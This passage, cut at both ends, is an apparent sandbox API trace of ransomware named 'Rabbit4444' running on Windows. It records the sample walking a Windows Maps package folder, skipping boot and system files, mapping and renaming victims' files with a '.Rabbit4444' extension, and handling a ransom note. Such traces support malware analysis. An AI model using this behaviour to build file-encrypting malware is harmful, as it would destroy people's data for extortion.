(lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0063.386] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0063.386] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0063.386] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0063.386] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0063.386] lstrcpyW (in: lpString1=0x130ebe0, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0063.386] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0063.386] lstrlenW (lpString="roaming.lock") returned 12 [0063.386] lstrlenW (lpString="Rabbit4444") returned 10 [0063.387] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0063.387] lstrlenW (lpString=".dll") returned 4 [0063.387] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0063.387] lstrlenW (lpString=".lnk") returned 4 [0063.387] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0063.387] lstrlenW (lpString=".ini") returned 4 [0063.387] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0063.387] lstrlenW (lpString=".sys") returned 4 [0063.387] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0063.387] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe196d39, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xbd2f14b6, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0063.387] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.387] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.387] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0063.387] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0063.387] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0063.387] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0063.387] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0063.387] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0063.387] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0063.387] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0063.387] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0063.387] lstrcpyW (in: lpString1=0x130ebe0, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0063.387] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0063.388] lstrlenW (lpString="settings.dat") returned 12 [0063.388] lstrlenW (lpString="Rabbit4444") returned 10 [0063.388] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0063.388] lstrlenW (lpString=".dll") returned 4 [0063.388] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0063.388] lstrlenW (lpString=".lnk") returned 4 [0063.388] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0063.388] lstrlenW (lpString=".ini") returned 4 [0063.388] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0063.388] lstrlenW (lpString=".sys") returned 4 [0063.388] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0063.388] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0063.388] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0063.388] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15469977893) returned 1 [0063.389] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0063.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0063.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0063.389] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x2a0 [0063.390] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0063.392] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e2c0 [0063.392] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0063.392] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e2c0 | out: hHeap=0xe0000) returned 1 [0063.392] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0063.392] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x123760 [0063.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0063.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0063.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0063.393] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15470355166) returned 1 [0063.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0063.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0063.393] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.393] CloseHandle (hObject=0x2a0) returned 1 [0063.393] CloseHandle (hObject=0x278) returned 1 [0063.393] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444") returned 107 [0063.393] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0063.394] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6428f7dd, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x6428f7dd, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x6428f7dd, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0063.394] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.394] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.394] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="Rabbit4444.exe") returned 1 [0063.394] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".") returned 1 [0063.394] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="..") returned 1 [0063.394] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="windows") returned -1 [0063.394] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="bootmgr") returned 1 [0063.394] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="pagefile.sys") returned 1 [0063.394] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="boot") returned 1 [0063.394] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="ids.txt") returned 1 [0063.394] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="NTUSER.DAT") returned 1 [0063.394] lstrcpyW (in: lpString1=0x130ebe0, lpString2="settings.dat.LOG1" | out: lpString1="settings.dat.LOG1") returned="settings.dat.LOG1" [0063.394] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1", dwFileAttributes=0x22) returned 1 [0063.395] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1", dwFileAttributes=0x6) returned 1 [0063.395] lstrlenW (lpString="settings.dat.LOG1") returned 17 [0063.395] lstrlenW (lpString="Rabbit4444") returned 10 [0063.395] lstrcmpiW (lpString1="s.dat.LOG1", lpString2="Rabbit4444") returned 1 [0063.395] lstrlenW (lpString=".dll") returned 4 [0063.395] lstrcmpiW (lpString1="LOG1", lpString2=".dll") returned 1 [0063.395] lstrlenW (lpString=".lnk") returned 4 [0063.395] lstrcmpiW (lpString1="LOG1", lpString2=".lnk") returned 1 [0063.395] lstrlenW (lpString=".ini") returned 4 [0063.395] lstrcmpiW (lpString1="LOG1", lpString2=".ini") returned 1 [0063.395] lstrlenW (lpString=".sys") returned 4 [0063.395] lstrcmpiW (lpString1="LOG1", lpString2=".sys") returned 1 [0063.395] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\settings\\settings.dat.log1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0063.396] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0063.396] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15470637363) returned 1 [0063.396] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0063.396] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0063.396] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0063.396] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x2a0 [0063.399] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0063.400] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e2c0 [0063.401] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0063.401] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e2c0 | out: hHeap=0xe0000) returned 1 [0063.401] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0063.401] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x123760 [0063.401] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0063.401] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0063.401] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0063.401] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15471174473) returned 1 [0063.401] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0063.401] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0063.401] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.401] CloseHandle (hObject=0x2a0) returned 1 [0063.401] CloseHandle (hObject=0x278) returned 1 [0063.401] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1.Rabbit4444") returned 112 [0063.401] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\settings\\settings.dat.log1"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\settings\\settings.dat.log1.rabbit4444"), dwFlags=0x1) returned 1 [0063.402] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6445067e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x6445067e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x6445067e, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0063.402] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.402] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.402] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="Rabbit4444.exe") returned 1 [0063.402] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".") returned 1 [0063.402] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="..") returned 1 [0063.402] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="windows") returned -1 [0063.402] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="bootmgr") returned 1 [0063.402] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="pagefile.sys") returned 1 [0063.402] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="boot") returned 1 [0063.402] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="ids.txt") returned 1 [0063.403] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="NTUSER.DAT") returned 1 [0063.403] lstrcpyW (in: lpString1=0x130ebe0, lpString2="settings.dat.LOG2" | out: lpString1="settings.dat.LOG2") returned="settings.dat.LOG2" [0063.403] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2", dwFileAttributes=0x22) returned 1 [0063.403] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2", dwFileAttributes=0x6) returned 1 [0063.404] lstrlenW (lpString="settings.dat.LOG2") returned 17 [0063.404] lstrlenW (lpString="Rabbit4444") returned 10 [0063.404] lstrcmpiW (lpString1="s.dat.LOG2", lpString2="Rabbit4444") returned 1 [0063.404] lstrlenW (lpString=".dll") returned 4 [0063.404] lstrcmpiW (lpString1="LOG2", lpString2=".dll") returned 1 [0063.404] lstrlenW (lpString=".lnk") returned 4 [0063.404] lstrcmpiW (lpString1="LOG2", lpString2=".lnk") returned 1 [0063.404] lstrlenW (lpString=".ini") returned 4 [0063.404] lstrcmpiW (lpString1="LOG2", lpString2=".ini") returned 1 [0063.404] lstrlenW (lpString=".sys") returned 4 [0063.404] lstrcmpiW (lpString1="LOG2", lpString2=".sys") returned 1 [0063.404] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6445067e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x6445067e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x6445067e, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0063.404] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0063.404] lstrcpyW (in: lpString1=0x130ebe0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.404] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.404] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.405] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.406] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.406] CloseHandle (hObject=0x278) returned 1 [0063.406] CloseHandle (hObject=0x298) returned 1 [0063.406] GetCurrentThreadId () returned 0xd98 [0063.406] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222e8 [0063.406] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\RoamingState" [0063.406] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124250 | out: hHeap=0xe0000) returned 1 [0063.406] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222e0 | out: hHeap=0xe0000) returned 1 [0063.406] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\RoamingState" [0063.406] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\RoamingState\\" [0063.406] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" [0063.406] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.407] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.410] FlushFileBuffers (hFile=0x298) returned 1 [0063.411] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.411] CloseHandle (hObject=0x298) returned 1 [0063.412] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\RoamingState") returned 87 [0063.412] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.412] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe170ad7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ab67a9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef1db11b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0063.412] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.412] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.412] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.412] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.412] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe170ad7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ab67a9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef1db11b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.412] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.412] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.412] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.412] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.412] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.412] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef1db11b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef1db11b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef1db11b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.412] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.412] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.412] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef1db11b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef1db11b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef1db11b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.412] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0063.413] lstrcpyW (in: lpString1=0x130ebe8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.413] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.414] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.414] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.414] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.414] CloseHandle (hObject=0x278) returned 1 [0063.414] CloseHandle (hObject=0x298) returned 1 [0063.414] GetCurrentThreadId () returned 0xd98 [0063.414] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122308 [0063.414] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\LocalState") 